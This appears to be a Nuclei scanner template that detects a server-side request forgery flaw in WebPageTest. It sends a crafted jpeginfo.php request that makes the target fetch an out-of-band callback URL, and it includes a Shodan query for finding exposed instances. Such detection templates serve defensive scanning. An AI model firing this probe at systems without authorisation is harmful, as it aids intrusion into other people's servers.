32 lines
939 B
YAML
32 lines
939 B
YAML
id: webpagetest-ssrf
|
|
|
|
info:
|
|
name: Web Page Test - Server Side Request Forgery (SSRF)
|
|
author: pdteam
|
|
severity: high
|
|
description: Web Page Test is vulnerable to SSRF.
|
|
reference:
|
|
- https://thinkloveshare.com/hacking/preauth_remote_code_execution_web_page_test/
|
|
- https://github.com/WPO-Foundation/webpagetest
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"WebPageTest"
|
|
tags: ssrf,webpagetest,oast
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jpeginfo/jpeginfo.php?url={{interactsh-url}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "File is not a JPEG Image"
|
|
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
# digest: 4a0a00473045022100e12c24463f9cca14f59a4f37ff3d86746a9574eff83546d598127763f2ade55402202feb4e13391e119d2a56c67661132463d7c58ea74344e8c03a331d10bcd28f06:922c64590222798bb761d5b6d8e72950 |